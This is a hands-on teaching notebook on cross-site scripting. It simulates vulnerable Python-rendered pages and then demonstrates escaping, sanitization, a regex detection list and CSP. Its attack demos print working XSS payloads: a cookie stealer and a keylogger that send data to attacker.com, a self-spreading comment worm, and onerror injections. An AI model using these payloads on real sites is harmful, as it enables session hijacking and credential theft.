# Cross-Site Scripting (XSS) - Hands-On Lab

**Part of HackLearn Pro**

Welcome to this interactive lab on Cross-Site Scripting! Learn how attackers exploit web applications through malicious scripts and how to prevent these attacks.

## Learning Objectives
- Understand the three types of XSS: Reflected, Stored, and DOM-based
- Learn how XSS attacks work and their impact
- Practice identifying XSS vulnerabilities
- Implement secure coding practices to prevent XSS
- Build defense mechanisms and sanitization functions

## Prerequisites
- Basic Python and HTML knowledge
- Understanding of web applications
- Familiarity with JavaScript (helpful)

---

## Setup

We'll simulate web application scenarios using Python and HTML:

In [None]:
import html
import re
from typing import Dict, List, Tuple
from urllib.parse import quote, unquote
from IPython.display import HTML, display

print("Setup complete! Ready to explore XSS vulnerabilities.")

## Part 1: Understanding XSS

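XSS allows attackers to inject malicious scripts into web pages viewed by other users. It works because the application places untrusted input into its output without encoding it, so the victim's browser runs the script with the same privileges as the site's own code.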

### Vulnerable Web Application Simulator

In [None]:
class VulnerableWebApp:
    """Simulates a vulnerable web application"""
    
    def __init__(self):
        self.comments = []  # Stored comments
        self.users = {
            'alice': {'session': 'abc123', 'role': 'admin'},
            'bob': {'session': 'xyz789', 'role': 'user'},
        }
    
    def generate_search_page(self, search_term: str) -> str:
        """Generate search results page (VULNERABLE to reflected XSS)"""
        # VULNERABLE: Directly embedding user input without escaping
        html_page = f"""
        <!DOCTYPE html>
        <html>
        <head>
            <title>Search Results</title>
            <style>
                body {{ font-family: Arial, sans-serif; padding: 20px; }}
                .result {{ background: #f0f0f0; padding: 10px; margin: 10px 0; }}
                .alert {{ color: red; font-weight: bold; }}
            </style>
        </head>
        <body>
            <h1>Search Results</h1>
            <p>You searched for: <strong>{search_term}</strong></p>
            <div class="result">No results found for "{search_term}"</div>
        </body>
        </html>
        """
        return html_page
    
    def generate_comment_page(self) -> str:
        """Generate comments page (VULNERABLE to stored XSS)"""
        comments_html = ""
        for comment in self.comments:
            # VULNERABLE: Directly embedding stored user content
            comments_html += f"""
            <div class="comment">
                <strong>{comment['user']}:</strong>
                <p>{comment['text']}</p>
            </div>
            """
        
        html_page = f"""
        <!DOCTYPE html>
        <html>
        <head>
            <title>Comments</title>
            <style>
                body {{ font-family: Arial, sans-serif; padding: 20px; }}
                .comment {{ background: #f9f9f9; padding: 10px; margin: 10px 0; border-left: 3px solid #007bff; }}
            </style>
        </head>
        <body>
            <h1>User Comments</h1>
            {comments_html if comments_html else "<p>No comments yet.</p>"}
        </body>
        </html>
        """
        return html_page
    
    def add_comment(self, user: str, text: str):
        """Add a comment (vulnerable - no sanitization)"""
        self.comments.append({'user': user, 'text': text})
    
    def generate_profile_page(self, username: str) -> str:
        """Generate user profile page (VULNERABLE)"""
        html_page = f"""
        <!DOCTYPE html>
        <html>
        <head>
            <title>User Profile</title>
        </head>
        <body>
            <h1>Profile: {username}</h1>
            <p>Welcome, {username}!</p>
        </body>
        </html>
        """
        return html_page

# Create vulnerable app
app = VulnerableWebApp()
print("✓ Vulnerable web application created!")

## Part 2: Reflected XSS

Reflected XSS occurs when a request parameter is echoed straight back in the response without output encoding. The payload typically arrives through a crafted link that the victim is tricked into opening.
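As a minimal sketch of that echo, the snippet below compares interpolating a parameter directly with passing it through `html.escape` first. The helper names `render_unsafe` and `render_escaped` are hypothetical and are not part of the lab's classes.

```python
import html

def render_unsafe(term: str) -> str:
    # Echoes the parameter straight into markup (vulnerable)
    return f"<p>You searched for: {term}</p>"

def render_escaped(term: str) -> str:
    # Encodes <, >, &, and quotes before interpolation
    return f"<p>You searched for: {html.escape(term)}</p>"

payload = '<script>alert(1)</script>'
print(render_unsafe(payload))
print(render_escaped(payload))
```

In the escaped version the browser would display the payload as literal text instead of parsing it as a script element.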

### Attack Demo 1: Basic Script Injection

In [None]:
print("Demo 1: Reflected XSS - Basic Script Injection")
print("=" * 70)

# Normal search query
normal_query = "python tutorial"
normal_page = app.generate_search_page(normal_query)
print(f"\nNormal query: {normal_query}")
print("Page generated successfully\n")

# XSS attack payload
xss_payload = '<script>alert("XSS Attack!")</script>'
xss_page = app.generate_search_page(xss_payload)

print(f"XSS payload: {xss_payload}")
print("\n🚨 VULNERABILITY DETECTED!")
print("The payload is embedded directly in the HTML:")
print("\nExtract from generated HTML:")
print("─" * 70)
# Show the vulnerable part
vulnerable_line = [line for line in xss_page.split('\n') if xss_payload in line][0]
print(vulnerable_line.strip())
print("─" * 70)
print("\n⚠️ If rendered in a browser, this would execute JavaScript!")
print("Impact: Cookie theft, session hijacking, page defacement")

### Attack Demo 2: Cookie Stealing

In [None]:
print("\nDemo 2: Reflected XSS - Cookie Stealing")
print("=" * 70)

# Payload that would steal cookies
cookie_steal_payload = '<script>fetch(\'http://attacker.com/steal?cookie=\' + document.cookie)</script>'

print(f"\nPayload: {cookie_steal_payload}")
print("\nWhat this does:")
print("1. Executes JavaScript in victim's browser")
print("2. Reads document.cookie (any cookie not flagged HttpOnly, such as a session token)")
print("3. Sends cookie to attacker's server")
print("4. Attacker can now impersonate the victim")

page = app.generate_search_page(cookie_steal_payload)
print("\n🚨 CRITICAL: Session hijacking possible!")

### Attack Demo 3: Keylogger Injection

In [None]:
print("\nDemo 3: Reflected XSS - Keylogger")
print("=" * 70)

# Payload that installs a keylogger
keylogger_payload = '''
<script>
document.addEventListener('keypress', function(e) {
    fetch('http://attacker.com/log?key=' + e.key);
});
</script>
'''.strip()

print(f"\nPayload (simplified):")
print(keylogger_payload)
print("\nWhat this does:")
print("1. Listens to all keyboard events")
print("2. Captures every keystroke")
print("3. Sends keystrokes to attacker's server")
print("4. Can capture passwords, credit cards, personal info")
print("\n🚨 CRITICAL: Complete input monitoring!")

## Part 3: Stored XSS

Stored XSS occurs when malicious scripts are saved in the database and executed when other users view the content.
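The store-then-render flow, along with the output escaping that breaks it, might be sketched as follows. The in-memory list `comment_store` stands in for a database, and both helper names are assumptions made for illustration.

```python
import html
from typing import Dict, List

comment_store: List[Dict[str, str]] = []  # stands in for a database table

def save_comment(user: str, text: str) -> None:
    # Store the raw text; encoding is deferred to render time
    comment_store.append({"user": user, "text": text})

def render_comments() -> str:
    # Escape every stored field as it is written into HTML
    return "\n".join(
        f"<p><strong>{html.escape(c['user'])}:</strong> {html.escape(c['text'])}</p>"
        for c in comment_store
    )

save_comment("attacker", "<script>alert(1)</script>")
save_comment("bob", "Nice post!")
print(render_comments())
```

Escaping at render time keeps the stored data unchanged, so the same record can later be encoded differently for another output context.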

In [None]:
print("\nDemo 4: Stored XSS - Persistent Attack")
print("=" * 70)

# Attacker posts a malicious comment
malicious_comment = '<script>alert("Stored XSS - Everyone who views this page is affected!")</script>'

print("\nAttacker posts malicious comment...")
app.add_comment('attacker', malicious_comment)
print("✓ Comment stored in database")

# Victim views the comments page
print("\nVictim views comments page...")
comments_page = app.generate_comment_page()

print("\n🚨 VULNERABILITY DETECTED!")
print("Malicious script is now part of the page HTML:")
print("─" * 70)
for line in comments_page.split('\n'):
    if '<script>' in line:
        print(line.strip())
print("─" * 70)

print("\n⚠️ Impact:")
print("- Every user who views this page is affected")
print("- Attack persists until admin removes the comment")
print("- Can steal sessions from ALL users")
print("- Usually more dangerous than reflected XSS: victims need not click a crafted link")

### Stored XSS: Advanced Payload

In [None]:
print("\nDemo 5: Stored XSS - Worm Attack")
print("=" * 70)

# Self-propagating XSS worm
worm_payload = '''
<script>
// Steal session
fetch('http://attacker.com/steal?cookie=' + document.cookie);

// Propagate by posting the same payload as a comment
// (if there's a comment API)
fetch('/api/comment', {
    method: 'POST',
    body: JSON.stringify({text: document.currentScript.innerHTML})
});
</script>
'''.strip()

print("Worm payload:")
print(worm_payload)
print("\nWhat this does:")
print("1. Steals the current user's session")
print("2. Automatically posts itself as a new comment")
print("3. Spreads to every user who views any infected comment")
print("4. Can spread across an entire platform within hours")
print("\n🚨 CRITICAL: Self-propagating attack (XSS worm)!")
print("\nReal-world example: Samy worm on MySpace (2005)")
print("- Infected over 1 million users in about 20 hours")
print("- Widely described as the fastest-spreading worm of its time")

## Part 4: DOM-based XSS

DOM-based XSS occurs when client-side JavaScript reads attacker-controllable data (such as the URL) and writes it into the page through an unsafe sink such as `innerHTML`.

In [None]:
print("\nDemo 6: DOM-based XSS")
print("=" * 70)

# Vulnerable JavaScript code example
vulnerable_js = '''
// VULNERABLE CODE (client-side)
const urlParams = new URLSearchParams(window.location.search);
const name = urlParams.get('name');
document.getElementById('greeting').innerHTML = 'Hello ' + name + '!';
'''

print("Vulnerable JavaScript:")
print(vulnerable_js)

print("\nNormal URL:")
print("https://example.com/page?name=Alice")
print("Result: Hello Alice!")

print("\nMalicious URL:")
malicious_url = 'https://example.com/page?name=<img src=x onerror="alert(document.cookie)">'
print(malicious_url)
print("\nResult: the broken image fires onerror, and the injected script runs!")

print("\n⚠️ Key difference from reflected XSS:")
print("- The server's response never contains the payload")
print("- Placed after '#' instead of '?', the payload is not even sent to the server")
print("- Server-side output escaping alone won't catch it")
print("- Must be fixed in the JavaScript code")
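One common client-side fix is to write untrusted values with `textContent`, which treats them as plain text, instead of `innerHTML`. The snippet below follows this lab's convention of holding JavaScript in a Python string. The element id `greeting` comes from the vulnerable example, while `safe_js` and the `'guest'` fallback are introduced here for illustration.

```python
# Safer counterpart to the vulnerable snippet, kept as a string for display
safe_js = '''
// SAFER CODE (client-side)
const urlParams = new URLSearchParams(window.location.search);
const name = urlParams.get('name') || 'guest';
// textContent never parses its value as markup, so tags stay inert text
document.getElementById('greeting').textContent = 'Hello ' + name + '!';
'''

print("Safer JavaScript:")
print(safe_js)
```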

## Part 5: XSS Defense Mechanisms

### Defense 1: HTML Escaping

In [None]:
class XSSDefense:
    """XSS defense utilities"""
    
    @staticmethod
    def html_escape(text: str) -> str:
        """Escape HTML special characters"""
        return html.escape(text)
    
    @staticmethod
    def strip_tags(text: str) -> str:
        """Remove all HTML tags"""
        return re.sub(r'<[^>]+>', '', text)
    
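    @staticmethod
    def sanitize_html(text: str, allowed_tags: List[str] = None) -> str:
        """Sanitize HTML, keeping only bare allowed tags (no attributes).

        Everything else, including disallowed tags, is escaped rather than
        removed, so leftover fragments cannot be reassembled into markup.
        """
        if allowed_tags is None:
            allowed_tags = ['b', 'i', 'u', 'em', 'strong']
        
        # Escape everything first so no user-supplied markup survives
        escaped = html.escape(text, quote=False)
        
        # Restore only exact <tag> / </tag> forms of the allowed tags;
        # tags carrying attributes (e.g. onclick) stay escaped
        names = '|'.join(re.escape(tag) for tag in allowed_tags)
        return re.sub(rf'&lt;(/?(?:{names}))&gt;', r'<\1>', escaped, flags=re.IGNORECASE)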
    
    @staticmethod
    def detect_xss(text: str) -> Tuple[bool, List[str]]:
        """Detect common XSS patterns (a heuristic blocklist, easy to evade)"""
        patterns = [
            (r'<script\b', 'Script tag detected'),  # also catches unclosed or external scripts
            (r'javascript:', 'JavaScript protocol detected'),
            (r'\bon\w+\s*=', 'Event handler detected'),  # \b avoids matching e.g. "donation="
            (r'<iframe', 'IFrame tag detected'),
            (r'<object', 'Object tag detected'),
            (r'<embed', 'Embed tag detected'),
            (r'eval\s*\(', 'Eval function detected'),
        ]
        
        detections = []
        for pattern, message in patterns:
            if re.search(pattern, text, re.IGNORECASE | re.DOTALL):
                detections.append(message)
        
        return len(detections) > 0, detections

# Test defenses
print("\nDemo 7: Defense Mechanisms")
print("=" * 70)

test_payloads = [
    '<script>alert("XSS")</script>',
    '<img src=x onerror="alert(1)">',
    '<a href="javascript:alert(1)">Click me</a>',
    'Hello <b>world</b>!',
]

for payload in test_payloads:
    print(f"\nOriginal: {payload}")
    print(f"HTML Escaped: {XSSDefense.html_escape(payload)}")
    print(f"Stripped: {XSSDefense.strip_tags(payload)}")
    print(f"Sanitized: {XSSDefense.sanitize_html(payload)}")
    
    is_xss, detections = XSSDefense.detect_xss(payload)
    if is_xss:
        print(f"⚠️ XSS detected: {', '.join(detections)}")
    else:
        print("✓ No XSS patterns detected")
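Pattern-based detection is easy to sidestep with encoding. The sketch below uses hypothetical `naive_detect` and `normalized_detect` helpers rather than the lab's `XSSDefense` class. It shows an entity-encoded `javascript:` URL slipping past a plain regex and being caught once the input is normalized with `html.unescape`. It covers only this one trick, so it should not be read as a complete filter.

```python
import html
import re

JS_PROTOCOL = re.compile(r'javascript:', re.IGNORECASE)

def naive_detect(text: str) -> bool:
    # Looks only at the raw characters
    return bool(JS_PROTOCOL.search(text))

def normalized_detect(text: str) -> bool:
    # Decode HTML entities first, as a browser does for attribute values
    return bool(JS_PROTOCOL.search(html.unescape(text)))

# "&#106;" is the character reference for "j"
payload = '<a href="&#106;avascript:alert(1)">Click me</a>'
print(naive_detect(payload))       # False
print(normalized_detect(payload))  # True
```

This is one reason output encoding is generally preferred over trying to enumerate every dangerous input.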

### Defense 2: Secure Web Application

In [None]:
class SecureWebApp:
    """Secure web application with XSS protection"""
    
    def __init__(self):
        self.comments = []
        self.defense = XSSDefense()
    
    def generate_search_page(self, search_term: str) -> str:
        """Generate search page with XSS protection"""
        # SECURE: Escape user input
        safe_term = html.escape(search_term)
        
        html_page = f"""
        <!DOCTYPE html>
        <html>
        <head>
            <title>Search Results</title>
            <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'">
        </head>
        <body>
            <h1>Search Results</h1>
            <p>You searched for: <strong>{safe_term}</strong></p>
        </body>
        </html>
        """
        return html_page
    
    def add_comment(self, user: str, text: str) -> Tuple[bool, str]:
        """Add comment with validation"""
        # Check for XSS
        is_xss, detections = self.defense.detect_xss(text)
        if is_xss:
            return False, f"Rejected: {', '.join(detections)}"
        
        # Sanitize content
        safe_text = self.defense.sanitize_html(text)
        safe_user = html.escape(user)
        
        self.comments.append({
            'user': safe_user,
            'text': safe_text
        })
        
        return True, "Comment added successfully"
    
    def generate_comment_page(self) -> str:
        """Generate secure comments page"""
        comments_html = ""
        for comment in self.comments:
            # Rendered as-is: add_comment() already escaped the user and sanitized the text
            comments_html += f"""
            <div class="comment">
                <strong>{comment['user']}:</strong>
                <p>{comment['text']}</p>
            </div>
            """
        
        html_page = f"""
        <!DOCTYPE html>
        <html>
        <head>
            <title>Comments</title>
            <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'">
        </head>
        <body>
            <h1>User Comments</h1>
            {comments_html if comments_html else "<p>No comments yet.</p>"}
        </body>
        </html>
        """
        return html_page

# Test secure app
print("\nDemo 8: Secure Web Application")
print("=" * 70)

secure_app = SecureWebApp()

# Try to inject XSS
test_comments = [
    ('alice', 'This is a <b>normal</b> comment'),
    ('attacker', '<script>alert("XSS")</script>'),
    ('bob', 'Great post! <i>Thanks</i>'),
    ('attacker', '<img src=x onerror="alert(1)">')
]

for user, text in test_comments:
    success, message = secure_app.add_comment(user, text)
    status = "✓" if success else "✗"
    print(f"\n{status} User '{user}': {message}")
    print(f"   Input: {text[:50]}..." if len(text) > 50 else f"   Input: {text}")

print("\n" + "=" * 70)
print("✓ Both XSS payloads above were rejected; the benign comments were accepted")

### Defense 3: Content Security Policy (CSP)

In [None]:
print("\nDemo 9: Content Security Policy")
print("=" * 70)

csp_examples = {
    "Restrictive": "default-src 'self'",
    "With CDN": "default-src 'self'; script-src 'self' https://cdn.example.com",
    "Development": "default-src 'self' 'unsafe-inline' 'unsafe-eval'",
    "Strict": "default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self' data:",
}

print("\nExample CSP Headers:\n")
for name, policy in csp_examples.items():
    print(f"{name}:")
    print(f"  Content-Security-Policy: {policy}")
    print()

print("What CSP does:")
print("✓ Blocks inline scripts unless 'unsafe-inline', a nonce, or a hash allows them")
print("✓ Restricts script sources to trusted origins")
print("✓ Limits where fetch/XHR can send data (connect-src), which hinders exfiltration")
print("✓ Reports violations when a report-uri or report-to directive is set")
print("\n⚠️ Note: CSP is a defense-in-depth measure, not a replacement for output encoding and input validation!")
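When a page genuinely needs an inline script, a per-response nonce is a common alternative to `'unsafe-inline'`. The following is a minimal sketch under that assumption. The function name `build_csp_with_nonce` is hypothetical, and a real application would send the policy as a response header from its web framework.

```python
import secrets
from typing import Tuple

def build_csp_with_nonce() -> Tuple[str, str]:
    # Fresh, unpredictable nonce for every response
    nonce = secrets.token_urlsafe(16)
    policy = f"default-src 'self'; script-src 'self' 'nonce-{nonce}'"
    return nonce, policy

nonce, policy = build_csp_with_nonce()
print(f"Content-Security-Policy: {policy}")
# Only inline scripts carrying the matching nonce attribute are allowed to run
print(f'<script nonce="{nonce}">console.log("trusted inline script")</script>')
```

An injected `<script>` tag has no way to know the nonce, so the browser refuses to execute it.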

## Part 6: Challenge Exercises

### Challenge 1: Build a Comprehensive XSS Filter

In [None]:
class AdvancedXSSFilter:
    """
    Advanced XSS filtering system
    
    TODO: Implement comprehensive XSS detection and filtering
    """
    
    def __init__(self):
        self.blocked_attempts = []
    
    def detect_xss(self, text: str) -> Tuple[bool, Dict]:
        """
        Detect XSS attempts
        
        TODO: Implement detection for:
        - Script tags (various encodings)
        - Event handlers
        - JavaScript protocols
        - Data URIs
        - Encoded payloads (base64, hex, unicode)
        - Obfuscated scripts
        
        Return: (is_xss, detailed_report)
        """
        pass
    
    def sanitize(self, text: str, context: str = 'html') -> str:
        """
        Context-aware sanitization
        
        TODO: Implement sanitization for different contexts:
        - HTML content
        - HTML attributes
        - JavaScript strings
        - URLs
        - CSS
        """
        pass

# Test your implementation
# filter = AdvancedXSSFilter()
# is_xss, report = filter.detect_xss("<script>alert(1)</script>")

### Challenge 2: Implement XSS Scanner

In [None]:
class XSSScanner:
    """
    Automated XSS vulnerability scanner
    
    TODO: Implement scanner that tests for XSS vulnerabilities
    """
    
    def __init__(self):
        self.payloads = [
            '<script>alert(1)</script>',
            '<img src=x onerror=alert(1)>',
            # Add more payloads
        ]
    
    def scan_input_field(self, submit_function, field_name: str) -> Dict:
        """
        Test an input field for XSS
        
        TODO: 
        - Test with various payloads
        - Detect if payload is reflected
        - Check if payload is executed
        - Report vulnerability severity
        """
        pass
    
    def generate_report(self) -> Dict:
        """Generate vulnerability report"""
        pass

# Test your scanner
# scanner = XSSScanner()
# report = scanner.scan_input_field(app.generate_search_page, 'search')

### Challenge 3: Build a CSP Validator

In [None]:
class CSPValidator:
    """
    Content Security Policy validator
    
    TODO: Implement CSP analysis and validation
    """
    
    def parse_csp(self, csp_header: str) -> Dict:
        """Parse CSP header into directives"""
        pass
    
    def validate_csp(self, csp_header: str) -> Tuple[bool, List[str]]:
        """
        Validate CSP for security issues
        
        TODO: Check for:
        - 'unsafe-inline' usage
        - 'unsafe-eval' usage
        - Overly permissive policies
        - Missing important directives
        - Incorrect syntax
        
        Return: (is_secure, list_of_issues)
        """
        pass
    
    def suggest_improvements(self, csp_header: str) -> List[str]:
        """Suggest CSP improvements"""
        pass

# Test your validator
# validator = CSPValidator()
# is_secure, issues = validator.validate_csp("default-src 'self' 'unsafe-inline'")

## Summary & Key Takeaways

In this lab, you learned:

1. **Three Types of XSS**:
   - **Reflected XSS**: User input immediately returned in response
   - **Stored XSS**: Malicious script saved in database
   - **DOM-based XSS**: Client-side script processes input unsafely

2. **Attack Vectors**:
   - Script tags
   - Event handlers (onerror, onclick, etc.)
   - JavaScript protocols (javascript:)
   - Data URIs
   - HTML attributes

3. **Defense Strategies**:
   - **Always escape output** based on context
   - Input validation and sanitization
   - Content Security Policy (CSP)
   - HttpOnly and Secure cookie flags
   - X-XSS-Protection header (deprecated: modern browsers have removed the XSS filter it controlled, so rely on CSP instead)
   - Use templating engines with auto-escaping
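The cookie flags from the list above can be illustrated with the standard library's `http.cookies` module. This is a sketch, assuming Python 3.8 or later for the `samesite` attribute. The session value `abc123` is borrowed from the lab's simulated users, and the `SameSite=Strict` setting is an extra hardening choice not covered in the lab itself.

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session"] = "abc123"
cookie["session"]["httponly"] = True      # hidden from document.cookie
cookie["session"]["secure"] = True        # sent over HTTPS only
cookie["session"]["samesite"] = "Strict"  # not attached to cross-site requests

header = cookie.output()
print(header)
```

With `HttpOnly` set, the cookie-stealing payload from Demo 2 would no longer see the session token, although the injected script could still act on the victim's behalf.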

### Best Practices
1. Treat all user input as untrusted
2. Use context-aware output encoding
3. Implement Content Security Policy
4. Use HttpOnly cookies to keep session tokens out of reach of JavaScript
5. Validate input on the server; treat client-side validation as a usability aid only, since attackers can bypass it
6. Use modern frameworks with built-in XSS protection
7. Regular security testing and code reviews
8. Educate developers about XSS risks
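To give a feel for what auto-escaping in a template engine does, here is a toy sketch built on `string.Formatter`. The class name `EscapingFormatter` is hypothetical, and production code would more likely use an established template engine than this illustration.

```python
import html
import string

class EscapingFormatter(string.Formatter):
    """Formatter that HTML-escapes every substituted value."""

    def format_field(self, value, format_spec):
        # Apply normal formatting, then encode the result for HTML content
        return html.escape(super().format_field(value, format_spec))

template = "<p>Welcome, {username}!</p>"
page = EscapingFormatter().format(template, username="<script>alert(1)</script>")
print(page)
```

The template's own markup passes through untouched, while every substituted value is encoded by default, so forgetting to escape a single field is no longer possible.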

### Context-Specific Encoding
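- **HTML Content**: Use HTML entity encoding (`<` becomes `&lt;`)
- **HTML Attributes**: Use attribute encoding and always quote the attribute value
- **JavaScript**: Use JavaScript string encoding (for example `\u003c` for `<`)
- **URLs**: Use URL (percent) encoding, and allow only expected schemes such as `https:`
- **CSS**: Use CSS encoding, or avoid placing untrusted data in styles altogether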
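Using only the standard library, four of these contexts might be handled as sketched below. The variable names and the sample `untrusted` value are illustrative assumptions. CSS is left out because the standard library has no CSS encoder.

```python
import html
import json
from urllib.parse import quote

untrusted = '"><script>alert(1)</script>'

# HTML content: encode the markup-significant characters
html_content = html.escape(untrusted, quote=False)

# HTML attribute: also encode quotes, and keep the value inside quotes
html_attribute = f'<input value="{html.escape(untrusted, quote=True)}">'

# JavaScript string: JSON-encode, then escape "<" so "</script>" cannot close the block
js_string = json.dumps(untrusted).replace("<", "\\u003c")

# URL query value: percent-encode everything outside the unreserved set
url_value = "https://example.com/search?q=" + quote(untrusted, safe="")

for label, value in [("content", html_content), ("attribute", html_attribute),
                     ("javascript", js_string), ("url", url_value)]:
    print(f"{label}: {value}")
```

The same input yields four different encodings, which is why a single generic "sanitize" step cannot make a value safe for every context.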

### Real-World Impact
- Account takeover and session hijacking
- Data theft and credential harvesting
- Malware distribution
- Website defacement
- Phishing attacks

### Further Reading
- [OWASP XSS Guide](https://owasp.org/www-community/attacks/xss/)
- [Content Security Policy Reference](https://content-security-policy.com/)
- [XSS Filter Evasion Cheat Sheet](https://owasp.org/www-community/xss-filter-evasion-cheatsheet)

---

**HackLearn Pro** - Learn by doing, secure by design.
